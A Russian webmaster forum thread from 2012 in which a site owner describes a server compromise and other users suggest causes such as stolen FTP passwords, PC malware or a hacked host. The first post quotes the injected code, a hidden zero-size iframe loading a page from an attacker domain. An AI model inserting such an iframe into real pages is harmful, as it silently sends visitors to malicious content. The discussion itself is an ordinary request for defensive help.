X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
> Взлом сервера
vissavi
vissavi
Topic Starter сообщение 17.5.2012, 13:49; Ответить: vissavi
Сообщение #1


здравствуйте. Недавно у меня взломали сервер и внесли изменения почти во все файлы с расширением php (добавили код который переадресует пользователей с поисковых систем на другие сайты) из-за этого много сайтов вылетели из индекса... добавили новые файлы (создали дополнительные странички, внесли изменения в карту сайта) и т.д. Я это все выявил, восстановил из чистого архива движки сайтов. По безопасности сделал следующее: запретил использование почтовых портов, ssh, и вход в админ панель только с одного ip адреса (он у меня статический). Но вот сегодня обнаружил, что опять на сайтах произошли изменения. Согласно журнала был вход под моим ip с 00-43 до 00-50 и изменены файлы в основном index.php внесли фрейм вида "<iframe src="http://mazahack.net/go.ph4lb" width=0 height=0 frameborder=0></iframe>" ...
Хостинг от firstvds.ru, виртуальный выделенный сервер.
Подскажите пожалуйста как такое стало возможным (статический адрес только у меня такой) и как я смогу себя обезопасить. Спасибо.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
livercom
livercom
сообщение 17.5.2012, 13:55; Ответить: livercom
Сообщение #2


Ну если все, как вы описали, то вредоносные программы осуществляли свою деятельность с вашего компьютера.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 17.5.2012, 14:44; Ответить: House
Сообщение #3


Вы стали частью ботнета olen.gif

или вируса, трояна и т.п.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
saraus
saraus
сообщение 17.5.2012, 14:54; Ответить: saraus
Сообщение #4


(vissavi @ 17.5.2012, 12:49) *
под моим ip с 00-43 до 00-50


Ну если так, то зараза внутри скорее всего, надо чистить всё


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Goodhoster
Goodhoster
сообщение 17.5.2012, 15:40; Ответить: Goodhoster
Сообщение #5


надо делать анализ, смотря как настроены пользователь файлов и права доступа, не стоят ли права 777.
Если процессы запускаются от пользователяи и права 644 - значит их изменили скорее всего под пользователем сайта, и скорее всего через данные доступа по FTP как часто бывает.
Если Вы сохраняете пароль для FTP у себя на ПК в клиенте FTP - значит у Вас вирус на ПК, поменяйте пароли и не сохраняйте.
Если например в w7 прикрепили FTP как диск там есть возможность и сохранили пароль - 100% с Вашего ПК крадут пароль.

на сервере проверьте папки /tmp /var/tmp может там скрипты вредоносные, но скорее всего FTP ...


--------------------
Goodhoster.NET - надежный профессиональный хостинг! ( Украина | Германия )
Хостинг | ВПС | Серверы | Домены


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
expssh
expssh
сообщение 17.5.2012, 19:42; Ответить: expssh
Сообщение #6


Можем предоставить защищенный хостинг, если заинтересованы, обращайтесь в ICQ: 212073065


--------------------
http://economhost.com
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
asAlbert
asAlbert
сообщение 17.5.2012, 19:49; Ответить: asAlbert
Сообщение #7


Тут предлагают услуги по чистки гадости на серверах, свяжитесь с ними

http://udalit-virus-s-saita.ru/
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
livercom
livercom
сообщение 17.5.2012, 20:23; Ответить: livercom
Сообщение #8


(expssh @ 17.5.2012, 18:42) *
Можем предоставить защищенный хостинг, если заинтересованы, обращайтесь в ICQ: 212073065

И чем же он защищен?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vissavi
vissavi
Topic Starter сообщение 17.5.2012, 20:46; Ответить: vissavi
Сообщение #9


комп проверил - чист. и первый раз проверял.... Сейчас сменил пароли, закрыл ftp полностью. Понаблюдаю..

Висит в фоновых заданияю такая ерунда:
buydomain

var/run/ispmgr/buydomain.asdasdasdasadsdas.ru

это нормально?

Сообщение отредактировал vissavi - 17.5.2012, 20:54


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rjksdfhe
rjksdfhe
сообщение 17.5.2012, 20:54; Ответить: rjksdfhe
Сообщение #10


По описанному в первом посте, и если свой комп чист - только одно остаётся - взломали вашего хостера, и по полной программе (доступ, понятно, там есть и полный).

В первую очередь надо логи посмотреть. Кто, куда, откуда.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
3 чел. читают эту тему (гостей: 3, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Hyper.hosting - сервера под любые задачи [разрешены dmca, гэмблинг, адалт и пр.]
Лучшие сервера по доступной цене
32 Hyper_Hosting 9139 15.4.2024, 13:03
автор: Hyper_Hosting
Открытая тема (нет новых ответов) HideHost.net - Виртуальные и выделенные сервера под любые Ваши проекты с индивидуальным подходом.
Работаем уже более 12 лет
6 HIDEHOST 2393 21.3.2024, 13:33
автор: Tihohodka
Открытая тема (нет новых ответов) [РЕКОМЕНДУЮ] >>>Тестирование Вашего сайта, сервера на устойчивость и уязвимость!
7 barbaddos 9478 3.7.2023, 20:18
автор: barbaddos
Горячая тема (нет новых ответов) Ускорение вашего сайта и сервера. Системный администратор Linux
44 EvaSystems 41795 6.2.2023, 13:07
автор: EvaSystems
Открытая тема (нет новых ответов) Обучение Email Рассылкам + Софт Для Автоматизации (100к в сутки с сервера)
8 zennoboss 4462 19.3.2022, 18:46
автор: zennoboss


 



RSS Текстовая версия Сейчас: 18.4.2024, 22:02
Дизайн